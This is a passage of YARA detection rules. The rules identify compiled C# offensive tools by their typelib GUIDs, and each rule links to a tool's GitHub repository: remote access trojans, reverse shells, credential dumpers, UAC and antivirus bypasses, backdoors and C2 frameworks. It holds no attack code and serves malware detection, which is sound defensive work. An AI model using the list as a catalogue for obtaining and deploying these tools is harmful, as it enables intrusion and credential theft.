    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_wsManager {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/guillaC/wsManager"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "9480809e-5472-44f3-b076-dcdf7379e766" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_UglyEXe {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/fashionproof/UglyEXe"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpDump {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/SharpDump"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_EducationalRAT {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/securesean/EducationalRAT"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Stealth_Kid_RAT {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ctsecurity/Stealth-Kid-RAT"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii wide nocase
    $typelibguid1 = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpCradle {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/anthemtotheego/SharpCradle"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BypassUAC {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/cnsimo/BypassUAC"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii wide nocase
    $typelibguid1 = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_hanzoInjection {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/P0cL4bs/hanzoInjection"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_clr_meterpreter {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/OJ/clr-meterpreter"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii wide nocase
    $typelibguid1 = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii wide nocase
    $typelibguid2 = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii wide nocase
    $typelibguid3 = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii wide nocase
    $typelibguid4 = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii wide nocase
    $typelibguid5 = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BYTAGE {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/KNIF/BYTAGE"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_MultiOS_ReverseShell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/belane/MultiOS_ReverseShell"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_HideFromAMSI {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DotNetAVBypass_Master {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/lockfale/DotNetAVBypass-Master"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpDPAPI {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/SharpDPAPI"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii wide nocase
    $typelibguid1 = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Telegra_Csharp_C2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/sf197/Telegra_Csharp_C2"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpCompile {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/SpiderLabs/SharpCompile"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Carbuncle {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/checkymander/Carbuncle"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_OSSFileTool {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/B1eed/OSSFileTool"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Rubeus {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/Rubeus"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Simple_Loader {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/cribdragg3r/Simple-Loader"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Minidump {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/3xpl01tc0d3r/Minidump"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpBypassUAC {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FatRodzianko/SharpBypassUAC"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpPack {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Lexus89/SharpPack"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid1 = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii wide nocase
    $typelibguid2 = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii wide nocase
    $typelibguid3 = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide nocase
    $typelibguid5 = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii wide nocase
    $typelibguid6 = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii wide nocase
    $typelibguid7 = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii wide nocase
    $typelibguid8 = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii wide nocase
    $typelibguid9 = "aec32155-d589-4150-8fe7-2900df4554c8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Salsa_tools {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Hackplayers/Salsa-tools"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "276004bb-5200-4381-843c-934e4c385b66" ascii wide nocase
    $typelibguid1 = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_WindowsDefender_Payload_Downloader {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Privilege_Escalation {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Marauder {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/maraudershell/Marauder"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AV_Evasion_Tool {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/1y0n/AV_Evasion_Tool"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii wide nocase
    $typelibguid1 = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Fenrir {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/nccgroup/Fenrir"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_StormKitty {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/LimerBoy/StormKitty"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii wide nocase
    $typelibguid1 = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Crypter_Runtime_AV_s_bypass {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RunAsUser {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/atthacks/RunAsUser"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_HWIDbypass {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/yunseok/HWIDbypass"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_XORedReflectiveDLL {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/r3nhat/XORedReflectiveDLL"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii wide nocase
    $typelibguid1 = "30eef7d6-cee8-490b-829f-082041bc3141" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Sharp_Suite {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/FuzzySecurity/Sharp-Suite"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii wide nocase
    $typelibguid1 = "5611236e-2557-45b8-be29-5d1f074d199e" ascii wide nocase
    $typelibguid2 = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii wide nocase
    $typelibguid3 = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii wide nocase
    $typelibguid4 = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii wide nocase
    $typelibguid5 = "a5f883ce-1f96-4456-bb35-40229191420c" ascii wide nocase
    $typelibguid6 = "28978103-d90d-4618-b22e-222727f40313" ascii wide nocase
    $typelibguid7 = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii wide nocase
    $typelibguid8 = "414187db-5feb-43e5-a383-caa48b5395f1" ascii wide nocase
    $typelibguid9 = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii wide nocase
    $typelibguid10 = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii wide nocase
    $typelibguid11 = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii wide nocase
    $typelibguid12 = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii wide nocase
    $typelibguid13 = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii wide nocase
    $typelibguid14 = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii wide nocase
    $typelibguid15 = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_rat_shell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/stphivos/rat-shell"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii wide nocase
    $typelibguid1 = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_dotnet_gargoyle {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/countercept/dotnet-gargoyle"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "76435f79-f8af-4d74-8df5-d598a551b895" ascii wide nocase
    $typelibguid1 = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii wide nocase
    $typelibguid2 = "6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_aresskit {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/BlackVikingPro/aresskit"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DLL_Injector {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/tmthrgd/DLL-Injector"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii wide nocase
    $typelibguid1 = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_TruffleSnout {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/dsnezhkov/TruffleSnout"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Anti_Analysis {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Anti-Analysis"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BackNet {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/valsov/BackNet"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii wide nocase
    $typelibguid1 = "243c279e-33a6-46a1-beab-2864cc7a499f" ascii wide nocase
    $typelibguid2 = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii wide nocase
    $typelibguid3 = "982dc5b6-1123-428a-83dd-d212490c859f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AllTheThings {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/johnjohnsp1/AllTheThings"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AddReferenceDotRedTeam {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Lime_Crypter {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Lime-Crypter"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BrowserGhost {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/QAX-A-Team/BrowserGhost"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpShot {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/tothi/SharpShot"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Offensive__NET {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mrjamiebowman/Offensive-.NET"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "11fe5fae-b7c1-484a-b162-d5578a802c9c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RuralBishop {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/RuralBishop"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "fe4414d9-1d7e-4eeb-b781-d278fe7a5619" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DeviceGuardBypasses {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/tyranid/DeviceGuardBypasses"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "f318466d-d310-49ad-a967-67efbba29898" ascii wide nocase
    $typelibguid1 = "3705800f-1424-465b-937d-586e3a622a4f" ascii wide nocase
    $typelibguid2 = "256607c2-4126-4272-a2fa-a1ffc0a734f0" ascii wide nocase
    $typelibguid3 = "4e6ceea1-f266-401c-b832-f91432d46f42" ascii wide nocase
    $typelibguid4 = "1e6e9b03-dd5f-4047-b386-af7a7904f884" ascii wide nocase
    $typelibguid5 = "d85e3601-0421-4efa-a479-f3370c0498fd" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AMSI_Handler {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/two06/AMSI_Handler"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "d829426c-986c-40a4-8ee2-58d14e090ef2" ascii wide nocase
    $typelibguid1 = "86652418-5605-43fd-98b5-859828b072be" ascii wide nocase
    $typelibguid2 = "1043649f-18e1-41c4-ae8d-ac4d9a86c2fc" ascii wide nocase
    $typelibguid3 = "1d920b03-c537-4659-9a8c-09fb1d615e98" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RAT_TelegramSpyBot {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/SebastianEPH/RAT.TelegramSpyBot"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "8653fa88-9655-440e-b534-26c3c760a0d3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_TheHackToolBoxTeek {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/teeknofil/TheHackToolBoxTeek"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "2aa8c254-b3b3-469c-b0c9-dcbe1dd101c0" ascii wide nocase
    $typelibguid1 = "afeff505-14c1-4ecf-b714-abac4fbd48e7" ascii wide nocase
    $typelibguid2 = "4cf42167-a5cf-4b2d-85b4-8e764c08d6b3" ascii wide nocase
    $typelibguid3 = "118a90b7-598a-4cfc-859e-8013c8b9339c" ascii wide nocase
    $typelibguid4 = "3075dd9a-4283-4d38-a25e-9f9845e5adcb" ascii wide nocase
    $typelibguid5 = "295655e8-2348-4700-9ebc-aa57df54887e" ascii wide nocase
    $typelibguid6 = "74efe601-9a93-46c3-932e-b80ab6570e42" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_USBTrojan {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mashed-potatoes/USBTrojan"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_IIS_backdoor {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/WBGlIl/IIS_backdoor"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii wide nocase
    $typelibguid1 = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ShellGen {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jasondrawdy/ShellGen"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Mass_RAT {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Mass-RAT"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii wide nocase
    $typelibguid1 = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii wide nocase
    $typelibguid2 = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Browser_ExternalC2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_OffensivePowerShellTasking {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/leechristensen/OffensivePowerShellTasking"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "d432c332-3b48-4d06-bedb-462e264e6688" ascii wide nocase
    $typelibguid1 = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DoHC2 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/SpiderLabs/DoHC2"
    author = "Arnim Rupp"
    date = "2020-12-13"
  strings:
    $typelibguid0 = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SyscallPOC {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/SolomonSklash/SyscallPOC"
    author = "Arnim Rupp"
